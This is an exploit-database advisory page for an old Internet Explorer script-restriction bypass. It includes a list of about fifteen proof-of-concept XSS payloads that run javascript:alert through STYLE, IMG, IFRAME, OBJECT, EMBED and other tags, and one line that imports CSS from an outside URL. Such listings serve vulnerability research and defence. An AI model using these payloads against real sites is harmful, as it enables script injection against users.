header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Security-Bypass
264
CWE
Product Name: Internet Explorer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Microsoft Internet Explorer Security-Bypass Vulnerability

Microsoft Internet Explorer is prone to a security-bypass vulnerability because it fails to properly enforce restrictions on script behavior. An attacker may exploit this issue to bypass restrictions on the execution of JavaScript code. This may aid in further attacks. Examples of the exploit include using the STYLE, IMG, BODY, LINK, META, IFRAME, DIV, STYLE, A, STYLE, OBJECT, STYLE, SCRIPT, VIDEO, LAYER, EMBED, and APPLET tags.

Mitigation:

Users should avoid visiting untrusted websites and clicking on suspicious links. Additionally, users should keep their web browsers and operating systems up-to-date with the latest patches and security updates.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/35455/info

Microsoft Internet Explorer is prone to a security-bypass vulnerability because it fails to properly enforce restrictions on script behavior.

An attacker may exploit this issue to bypass restrictions on the execution of JavaScript code. This may aid in further attacks. 

<STYLE>@import 'javascript:alert("xss1")';</STYLE> <IMG SRC=javascript:alert('XSS2')> <BODY BACKGROUND="javascript:alert('XSS3')"> <LINK REL="stylesheet" HREF="javascript:alert('XSS4');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');"> <IFRAME SRC="javascript:alert('XSS6');"></IFRAME> <DIV STYLE="background-image: url(javascript:alert('XSS7'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS8')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS9')")}</STYLE> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS10')></OBJECT> <STYLE>@import'http://example.com/xss.css';</STYLE> <script SRC="javascript:alert('xss11');"></script> <video SRC="javascript:alert('xss12');"</video> <LAYER SRC="javascript:alert('xss13')"></LAYER> <embed src="javascript:alert('xss14')" type="application/x-shockwave-flash" allowscriptaccess="always" width="0" height="0"></embed> <applet src="javascript:alert('xss15')" type=text/html>